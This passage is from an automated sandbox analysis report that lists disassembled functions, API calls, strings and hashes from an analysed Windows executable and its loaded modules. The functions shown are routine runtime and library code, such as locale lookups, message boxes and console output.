GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,?,?,?,?,00007FFDFF2078D0,?,?,?,?,?,?,?,?), ref: 00007FFDFF1C7ED1

Strings

GetDateFormatEx, xrefs: 00007FFDFF1C7EC7
GetLocaleInfoEx, xrefs: 00007FFDFF1C7EB9

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: AddressDateFormatLibraryLoadProc
String ID: GetDateFormatEx$GetLocaleInfoEx
API String ID: 1758650912-3651929019
Opcode ID: d373f0e859db451b96f89b34587a8468e8933e2d536043dcbf54bc6942e71227
Instruction ID: 4c351483f1b91c1143b4362835aab6fc65b2249231edac19614f64d8e3b10cb8
Opcode Fuzzy Hash: d373f0e859db451b96f89b34587a8468e8933e2d536043dcbf54bc6942e71227
Instruction Fuzzy Hash: 6A317262B18B0582EB14CB26E86066967A2BB88BD4F044335DE7DC77E9DF7CE9058704

Function 00007FFDFF1C8184 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84libraryloadertimeCOMMON

Download Yara Rule

APIs

GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(?,?,?,?,?,?,?,00007FFDFF207972,?,?,?,?,?,?,?,?), ref: 00007FFDFF1C8253

Part of subcall function 00007FFDFF16FD08: LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFDFF1C852F,?,?,?,00007FFDFF1716D7,?,?,?,?,?,00007FFDFF151139), ref: 00007FFDFF16FD4C

GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,?,?,?,?,00007FFDFF207972,?,?,?,?,?,?,?,?), ref: 00007FFDFF1C8201

Strings

GetTimeFormatEx, xrefs: 00007FFDFF1C81F7
GetLocaleInfoEx, xrefs: 00007FFDFF1C81E9

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: AddressFormatLibraryLoadProcTime
String ID: GetLocaleInfoEx$GetTimeFormatEx
API String ID: 2567612442-1887218579
Opcode ID: b227c6bf583f03f38edef92bd4e379e4bd895ab4223143a4a886188479112374
Instruction ID: 18e6ead24b48271aaa7cb7220183157b57fd39b8ecff20c84762cebf436a78e0
Opcode Fuzzy Hash: b227c6bf583f03f38edef92bd4e379e4bd895ab4223143a4a886188479112374
Instruction Fuzzy Hash: 5E316D62B08B0586EB14CB26A86056A67A1BB89BD4F044335DE7D837E8DF3CE901C704

Function 00007FF6399B7530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF6399B324C,?,?,00007FF6399B3964), ref: 00007FF6399B7642

Strings

%s%c, xrefs: 00007FF6399B75B4
\, xrefs: 00007FF6399B75A7
%.*s, xrefs: 00007FF6399B75FB

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
Instruction ID: 8846fdd1bb4b4233eed4c4826b2616586a46262ca5fd9c71381376cdd8869245
Opcode Fuzzy Hash: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
Instruction Fuzzy Hash: E131CC21A19AC585EA219F15E8507E66366FF44BE0F484331EE6DC3BCEDE3CD6059B00

Function 00007FFDFF19A244 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFDFF19A2AB

Strings

%lf, xrefs: 00007FFDFF19A2E0

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: NameName::
String ID: %lf
API String ID: 1333004437-2891890143
Opcode ID: 76b40b984deb1d5d3409520479dc605476c781ddc7659a48f7d22b4eece458df
Instruction ID: 464db9407669e0f75d26e658634f164276551d3957822160d55a20540d592676
Opcode Fuzzy Hash: 76b40b984deb1d5d3409520479dc605476c781ddc7659a48f7d22b4eece458df
Instruction Fuzzy Hash: 74317063B1CB8585EB308F24A460A6977A0FB89B88F844375D9BD8739DCF2CD2058780

Function 00007FFDFF172018 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFDFF171FB3), ref: 00007FFDFF1720A2
GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,00007FFDFF171FB3), ref: 00007FFDFF1AF15A

Strings

GetUserDefaultLocaleName, xrefs: 00007FFDFF172098
LCIDToLocaleName, xrefs: 00007FFDFF1AF12A

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: AddressDefaultProcUser
String ID: GetUserDefaultLocaleName$LCIDToLocaleName
API String ID: 306211784-2335043742
Opcode ID: fd065f756cd199fe09b8b20e6f1a915649d8265c93160c0e9aeaa312b6cae046
Instruction ID: e1e1dc6a81eb845e1c1c52cff7edbab2c63445b9bee6331399122259aa939224
Opcode Fuzzy Hash: fd065f756cd199fe09b8b20e6f1a915649d8265c93160c0e9aeaa312b6cae046
Instruction Fuzzy Hash: B4214C52B08A4642FB149715E8309BA23A1AF49BD0F445335DD3DCB7D9EF6DE946C340

Function 00007FFDFF15288C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFDFF152911
IsValidLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFDFF1AEB81

Strings

LCIDToLocaleName, xrefs: 00007FFDFF1AEB42
IsValidLocaleName, xrefs: 00007FFDFF152907

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: AddressLocaleProcValid
String ID: IsValidLocaleName$LCIDToLocaleName
API String ID: 2003423906-1752364312
Opcode ID: af4dd28f265cf180873b22be5fc6fcfa97ac4912e5076198db1c03797db92877
Instruction ID: 8f4df1f3a14be74e11cb35a6f1754ec53a6f5f1d4637d2c376b69178abfde010
Opcode Fuzzy Hash: af4dd28f265cf180873b22be5fc6fcfa97ac4912e5076198db1c03797db92877
Instruction Fuzzy Hash: F8217F52F08B4642FB089B59A8309B52391AB89BD0F045335DD3ECB7DDEF6CE9458340

Function 00007FF6399B25F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6399B86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6399B3FA4,00000000,00007FF6399B1925), ref: 00007FF6399B86E9

MessageBoxW.USER32 ref: 00007FF6399B2686
MessageBoxA.USER32 ref: 00007FF6399B269A

Strings

Error, xrefs: 00007FF6399B2677
Error/warning (ANSI fallback), xrefs: 00007FF6399B268E

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error$Error/warning (ANSI fallback)
API String ID: 1878133881-653037927
Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction ID: 16e0cd8b1f2bb6fd58d8a27bb4461ba4fa10eaf816b73712c1ced64da12dcc66
Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction Fuzzy Hash: B2116D72A28B8681FA208F10F491BA97365FF48B84F94513ADA4D8778ADF3DD605DB40

Function 00007FF6399B2870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6399B86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6399B3FA4,00000000,00007FF6399B1925), ref: 00007FF6399B86E9

MessageBoxW.USER32 ref: 00007FF6399B2906
MessageBoxA.USER32 ref: 00007FF6399B291A

Strings

Error/warning (ANSI fallback), xrefs: 00007FF6399B290E
Warning, xrefs: 00007FF6399B28F7

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error/warning (ANSI fallback)$Warning
API String ID: 1878133881-2698358428
Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction ID: 559decaf77f2357d81b21f6d0e5b6c65bbe813e5ed0b16b6e83943f70d842585
Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction Fuzzy Hash: 13116072628B8681FA208F10F491BA97365FF44B84F945136DA4D8778ADF3DD605DB40

Function 00007FFE14634984 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE14633588: PyErr_Format.PYTHON311 ref: 00007FFE146337DF

PySys_Audit.PYTHON311 ref: 00007FFE146349DC

Part of subcall function 00007FFE14633A8C: PyEval_SaveThread.PYTHON311 ref: 00007FFE14633AAA
Part of subcall function 00007FFE14633A8C: connect.WS2_32 ref: 00007FFE14633ABD
Part of subcall function 00007FFE14633A8C: PyEval_RestoreThread.PYTHON311 ref: 00007FFE14633AC8
Part of subcall function 00007FFE14633A8C: WSAGetLastError.WS2_32 ref: 00007FFE14633AD6
Part of subcall function 00007FFE14633A8C: WSAGetLastError.WS2_32 ref: 00007FFE14633AE2
Part of subcall function 00007FFE14633A8C: PyErr_CheckSignals.PYTHON311 ref: 00007FFE14633AEF
Part of subcall function 00007FFE14633A8C: WSASetLastError.WS2_32 ref: 00007FFE14633B2C

PyLong_FromLong.PYTHON311 ref: 00007FFE14634A01

Strings

socket.connect, xrefs: 00007FFE146349D5
connect_ex, xrefs: 00007FFE146349A3

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: ErrorLast$Err_Eval_Thread$AuditCheckFormatFromLongLong_RestoreSaveSignalsSys_connect
String ID: connect_ex$socket.connect
API String ID: 3879675179-935070752
Opcode ID: 615fd2360326833a6a60dca547207173dd1fa388e9224988211b89f70189991b
Instruction ID: 76ce258e82957f3ef4423a64e2a272ab88b13ab132ab98394cca7ca558ac4a19
Opcode Fuzzy Hash: 615fd2360326833a6a60dca547207173dd1fa388e9224988211b89f70189991b
Instruction Fuzzy Hash: A9110021618FC281E6608B63F8917A663A4FF467E8F441176DA4D47769EE3CD5488B80

Function 00007FFE1A492630 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A4969C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4925CE), ref: 00007FFE1A4969CE

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A49266E

Strings

MOC, xrefs: 00007FFE1A492648
RCC, xrefs: 00007FFE1A492640
csm, xrefs: 00007FFE1A492650

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: abortterminate
String ID: MOC$RCC$csm
API String ID: 661698970-2671469338
Opcode ID: e63037d86fd6ed08c01758bd2d278b6a49b1453d2f75febe4acf0c3d16fc865e
Instruction ID: a4998b6184a6b00db24269e52f90e8c56120579be00f61737f90a39449736321
Opcode Fuzzy Hash: e63037d86fd6ed08c01758bd2d278b6a49b1453d2f75febe4acf0c3d16fc865e
Instruction Fuzzy Hash: B2F04F72A18A0682E7705F66E1811787664EB8CFA4F0951F2DB4E06666CF3CD8B0CA41

Function 00007FFDFF168124 Relevance: 6.3, APIs: 5, Instructions: 81COMMON

Download Yara Rule

APIs

EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFDFF167EF2), ref: 00007FFDFF168144
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFDFF167EF2), ref: 00007FFDFF16819A
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFDFF167EF2), ref: 00007FFDFF168210
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFDFF167EF2), ref: 00007FFDFF168226
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFDFF167EF2), ref: 00007FFDFF16823F

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 4100719efe9d854f9b7716aa9e4251e023a1aaaee31d27ad4d348d19ee20d00d
Instruction ID: 4bb261cdfa1fd4d49c54da542184f1df5127e41247fa42c9ca0293f967b6a0ae
Opcode Fuzzy Hash: 4100719efe9d854f9b7716aa9e4251e023a1aaaee31d27ad4d348d19ee20d00d
Instruction Fuzzy Hash: C531B222F18A4682EB008B05A8649796754FF94BE4F19133AD97E8B7E9DF7CE581C304

Function 00007FFDFF203D74 Relevance: 6.3, APIs: 4, Instructions: 303fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FFDFF203DEE

Part of subcall function 00007FFDFF156DC0: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FFDFF156DF6

WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFF2040B1
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFF2040FC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF2041A6

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 2559a85df2c0037cd417133e683f23b1ba6f00942d0fc49d4df678dcf37673d3
Instruction ID: 4f41c513ba127bca8538dcd70071cdab7d22a21413fbaf85ed4916f393071715
Opcode Fuzzy Hash: 2559a85df2c0037cd417133e683f23b1ba6f00942d0fc49d4df678dcf37673d3
Instruction Fuzzy Hash: E1D1B133B097959AEB11CFA5D4906AC7771EB14798B048236CE6ED7BC9DE38D11AC340

Function 00007FF6399CB8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6399CB92F
WriteFile.KERNEL32 ref: 00007FF6399CBBF7
WriteFile.KERNEL32 ref: 00007FF6399CBC3D
GetLastError.KERNEL32 ref: 00007FF6399CBCF3

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
Instruction ID: 522991cfb172185b3d0181259fdc16485db0645afec835f0a40e5d5d2d729499
Opcode Fuzzy Hash: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
Instruction Fuzzy Hash: C3D1E372F48A8289E711CF69D8402AC37B2FB54798B184235CE5E97BDEDE38D516DB00

Function 00007FF6399CC270 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6399CC25B), ref: 00007FF6399CC38C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6399CC25B), ref: 00007FF6399CC417

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
Instruction ID: 556f40c70d83627847319ecf1d1fc412200c3595e18f3c8243bdcbd8c870ccb9
Opcode Fuzzy Hash: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
Instruction Fuzzy Hash: E391A672F0865295F750CF65988027D6BA2BB44F88F584539DE0E96BCEEE38E441EF10

Function 00007FFDFF199834 Relevance: 6.2, APIs: 4, Instructions: 195COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFDFF19B904: DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19B995
Part of subcall function 00007FFDFF19B904: DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19B9CE
Part of subcall function 00007FFDFF19B904: DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19BCF7

DName::operator+.LIBVCRUNTIME ref: 00007FFDFF199996
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF1999F5
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF199A27
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF199A37

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 164514f8c0eb76063aac432d0361355c4139350aa8a9d8427b603af64556775f
Instruction ID: a4f07a95778947931502e104a9db1054c667f3aa76ce35a306d1ad87d3338483
Opcode Fuzzy Hash: 164514f8c0eb76063aac432d0361355c4139350aa8a9d8427b603af64556775f
Instruction Fuzzy Hash: 3AA16623F18A4699EB218F60D460BB837A0EB8570CF848235DA7E576DDDF789A45C380

Function 00007FFE1A49A058 Relevance: 6.2, APIs: 4, Instructions: 193COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE1A49C78C: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49C81D
Part of subcall function 00007FFE1A49C78C: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49C856
Part of subcall function 00007FFE1A49C78C: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49CB83

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49A1B3
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49A212
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49A244
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49A254

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 648336d396e82ff845145f22116d02ab074a94aa94e21a1e761fb2f6b175ab31
Instruction ID: 830a68877991548a580b63923dfe499ca34348eb5150060fdcae888c822ad143
Opcode Fuzzy Hash: 648336d396e82ff845145f22116d02ab074a94aa94e21a1e761fb2f6b175ab31
Instruction Fuzzy Hash: 66915266F08A5289FB318F62D4413BC37A1BB48B28F5441F7DA4E176A5DF3C9466C340

Function 00007FFE1A49A814 Relevance: 6.1, APIs: 4, Instructions: 133COMMONLIBRARYCODE

Download Yara Rule

APIs

